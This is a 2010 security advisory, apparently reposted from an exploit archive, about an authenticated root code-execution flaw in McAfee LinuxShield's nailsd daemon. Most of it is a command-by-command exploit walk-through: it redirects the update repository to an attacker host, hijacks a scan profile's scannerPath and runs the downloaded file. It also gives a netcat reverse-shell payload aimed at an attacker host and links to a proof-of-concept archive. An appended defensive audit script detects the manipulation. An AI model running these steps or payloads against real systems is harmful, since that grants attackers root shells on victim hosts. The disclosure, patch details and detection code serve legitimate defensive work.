============================================================
McAfee LinuxShield remote/local Code Execution Vulnerability
============================================================

Title:                 McAfee LinuxShield remote/local code execution
Severity:              Medium
Affected Products:     McAfee LinuxShield <= 1.5.1
Not Affected Products: McAfee LinuxShield 1.5.1 with HF550192
Remote Exploitable:    Yes (attacker must be authenticated)
Local Exploitable:     Yes
Patch Status:          Vendor released a patch (see Solution)
Discovered by:         Nikolas Sotiriu
Thanks to:             Thierry Zoller: for the permission to use his Policy

Background:
===========
LinuxShield detects and removes viruses and other potentially unwanted software on Linux-based systems. LinuxShield uses the powerful McAfee scanning engine, the engine common to all our anti-virus products.

Although a few years ago the Linux operating system was considered a secure environment, it is now seeing more occurrences of software specifically written to attack or exploit security weaknesses in Linux-based systems. Increasingly, Linux-based systems interact with Windows-based computers. Although viruses written to attack Windows-based systems do not directly attack Linux systems, a Linux server can harbor these viruses, ready to infect any client that connects to it.

When installed on your Linux systems, LinuxShield provides protection against viruses, Trojan horses, and other types of potentially unwanted software. LinuxShield scans files as they are opened and closed, a technique known as on-access scanning. LinuxShield also incorporates an on-demand scanner that enables you to scan any directory or file in your host at any time.

When kept up to date with the latest virus-definition (DAT) files, LinuxShield is an important part of your network security. We recommend that you set up an anti-virus security policy for your network, incorporating as many protective measures as possible.

LinuxShield uses a web-browser interface, and a large number of LinuxShield installations can be centrally controlled by ePolicy Orchestrator.

(Product description from the LinuxShield Product Guide)

Description:
============
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of McAfee LinuxShield. User interaction is not required to exploit this vulnerability, but an attacker must be authenticated.

The LinuxShield web interface communicates with the locally installed "nailsd" daemon, which listens on port 65443/tcp, to make configuration changes, query the configuration and execute tasks. Any user who can log in to the victim host can also authenticate to "nailsd" and can then make configuration changes and execute tasks with root privileges. Direct execution of commands is not possible, but it is possible to download and execute code by manipulating the configuration and running LinuxShield's scheduled tasks.

Walk-through (after the TLS handshake):
+--------------------------------------
nailsd  > +OK welcome to the NAILS Statistics Service
attacker> auth <user> <pass>
nailsd  > +OK successful authentication

# Set the attacker repository to download our code from an httpd
# (catalog.z)
#---------------------------------------------------------------
attacker> db set 1 _table=repository status=1 siteList=<?xml version="1.0" encoding="UTF-8"?><ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="20030131003110" LocalVersion="20091209161903" Type="Client"><SiteList Default="1" Name="SomeGUID"><HttpSite Type="repository" Name="EvilRepo" Order="1" Server="<attackerhost>:80" Enabled="1" Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update
nailsd  > +OK database changes buffered.

# Execute task to set the attacker repository
#---------------------------------------------------------------
attacker> task setsitelist
nailsd  > +OK setting sitelist from CMA.

# Execute the default Update task to download the code
#---------------------------------------------------------------
attacker> task nstart LinuxShield Update
nailsd  > +OK task LinuxShield Update starting

# Create a scan profile which executes our code. The profiles are
# not stored in the database.
# Scan profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
#---------------------------------------------------------------
attacker> sconf ODS_99 begin
nailsd  > +OK 1260400888

# Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
# where our earlier downloaded catalog.z file is stored
# (/opt/McAfee/cma/scratch/update/catalog.z).
#---------------------------------------------------------------
attacker> sconf ODS_99 set 1260400888
    nailsd.profile.ODS_99.allFiles=true
    nailsd.profile.ODS_99.childInitTmo=60
    nailsd.profile.ODS_99.cleanChildren=2
    nailsd.profile.ODS_99.cleansPerChild=10000
    nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat
    nailsd.profile.ODS_99.decompArchive=true
    nailsd.profile.ODS_99.decompExe=true
    nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib
    nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
    nailsd.profile.ODS_99.factoryInitTmo=60
    nailsd.profile.ODS_99.heuristicAnalysis=true
    nailsd.profile.ODS_99.macroAnalysis=true
    nailsd.profile.ODS_99.maxQueSize=32
    nailsd.profile.ODS_99.mime=true
    nailsd.profile.ODS_99.noJokes=false
    nailsd.profile.ODS_99.program=true
    nailsd.profile.ODS_99.quarantineChildren=1
    nailsd.profile.ODS_99.quarantineDirectory=/quarantine
    nailsd.profile.ODS_99.quarantinesPerChild=10000
    nailsd.profile.ODS_99.scanChildren=2
    nailsd.profile.ODS_99.scanMaxTmo=301
    nailsd.profile.ODS_99.scanNWFiles=true
    nailsd.profile.ODS_99.scanOnRead=true
    nailsd.profile.ODS_99.scanOnWrite=true
    nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z
    nailsd.profile.ODS_99.scansPerChild=10000
    nailsd.profile.ODS_99.slowScanChildren=0
    nailsd.profile.ODS_99.filter.0.type=exclude-path
    nailsd.profile.ODS_99.filter.0.path=/proc
    nailsd.profile.ODS_99.filter.0.subdir=true
    nailsd.profile.ODS_99.filter.extensions.mode=all
    nailsd.profile.ODS_99.filter.extensions.type=extension
    nailsd.profile.ODS_99.action.Default.primary=Clean
    nailsd.profile.ODS_99.action.Default.secondary=Quarantine
    nailsd.profile.ODS_99.action.App.primary=Clean
    nailsd.profile.ODS_99.action.App.secondary=Quarantine
    nailsd.profile.ODS_99.action.timeout=Pass
    nailsd.profile.ODS_99.action.error=Block
nailsd  > +OK configuration changes buffered
attacker> sconf ODS_99 commit 1260400888
nailsd  > +OK configuration changes stored

# Set a scan task with the manipulated profile to execute the code
#---------------------------------------------------------------
attacker> db set 1260400888 _table=schedule taskName=Evil Task taskType=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 i _lastRun=1260318482 status=Stopped _cmd=insert
nailsd  > +OK database changes buffered

# Execute scan task to execute the code
#---------------------------------------------------------------
attacker> task nstart Evil Task
+--------------------------------------
walk-through EOF

To get a reverse root shell, place something like this in the catalog.z:

--- snip ---
#!/bin/sh
nc -nv <attacker_host> 4444 -e /bin/sh
--- /snip ---

Proof of Concept:
=================
http://inj3ct0r.com/sploits/11165.tar.gz

Solution:
=========
McAfee Advisory
+--------------
https://kc.mcafee.com/corporate/index?page=content&id=SB10007

Disclosure Timeline (YYYY/MM/DD):
=================================
2009.12.07: Vulnerability found
2010.02.03: Asked vendor for a PGP key
2010.02.05: Vendor sent his PGP key
2010.02.05: Sent PoC, advisory, disclosure policy and planned disclosure date (2010.02.18) to vendor
2010.02.05: Vendor acknowledges receipt of the advisory
2010.02.16: Asked for a status update, because the planned release date is 2010.02.18
2010.02.16: Vendor responds that they are currently working on a patch
2010.02.17: Changed release date to 2010.02.25
2010.02.22: Vendor gives a status update that they are able to release the patch on 2010.02.25
2010.02.24: Asked for a list of affected products and the advisory URL
2010.02.24: Vendor sends the list
2010.03.02: Release of this advisory

# 0day.today [2024-11-15] #
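A defender-side audit for the profile manipulation shown in the walk-through (the hijacked scannerPath that makes a scan task load the downloaded catalog.z), added here as an example and not part of the advisory or of McAfee's tooling. It assumes the ODS profile settings can be read back as the same nailsd.profile.<name>.<key>=<value> tokens that "sconf <profile> set" takes (the on-disk layout of ods.cfg is not described in the advisory), and that a legitimate scannerPath, like enginePath and engineLibDir, lives under /opt/NAI/LinuxShield/engine/.

```python
"""Audit LinuxShield on-demand scan (ODS) profiles for a hijacked scannerPath.
Added example, not McAfee code. Assumes profile settings are available as the
same nailsd.profile.<name>.<key>=<value> tokens the walk-through passes to
"sconf <profile> set"; the on-disk format of ods.cfg is not given in the advisory.
"""
import re
from typing import Dict, List

ENGINE_DIR = "/opt/NAI/LinuxShield/engine/"   # legitimate engine tree (paths from the advisory)
CMA_SCRATCH = "/opt/McAfee/cma/scratch/"      # update download area abused in the walk-through
LOADABLE_KEYS = ("scannerPath", "enginePath", "engineLibDir")  # values the scanner loads or runs

_TOKEN = re.compile(r"^nailsd\.profile\.(?P<profile>[^.]+)\.(?P<key>[^=]+)=(?P<value>.*)$")

# Constructed sample: ODS_5 is a benign profile, ODS_99 mirrors the walk-through.
SAMPLE_SETTINGS = """
nailsd.profile.ODS_5.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat
nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib
nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z
nailsd.profile.ODS_99.filter.0.path=/proc
"""


def parse_profiles(text: str) -> Dict[str, Dict[str, str]]:
    """Group whitespace-separated profile tokens by profile name; other tokens are ignored."""
    profiles: Dict[str, Dict[str, str]] = {}
    for token in text.split():
        m = _TOKEN.match(token)
        if m:
            profiles.setdefault(m["profile"], {})[m["key"]] = m["value"]
    return profiles


def find_suspicious(profiles: Dict[str, Dict[str, str]]) -> List[str]:
    """Flag loadable paths outside the engine tree or inside the CMA download scratch area."""
    findings: List[str] = []
    for name, settings in sorted(profiles.items()):
        for key in LOADABLE_KEYS:
            value = settings.get(key, "")
            if value.startswith(CMA_SCRATCH):
                findings.append(f"{name}: {key}={value} points into the update download area")
            elif value and not value.startswith(ENGINE_DIR):
                findings.append(f"{name}: {key}={value} is outside {ENGINE_DIR}")
    return findings


if __name__ == "__main__":
    for line in find_suspicious(parse_profiles(SAMPLE_SETTINGS)) or ["no suspicious profiles found"]:
        print(line)
```

Run against the real profile dump on a host still on 1.5.1 without HF550192; any finding on scannerPath is a strong indicator that the walk-through's profile manipulation has taken place.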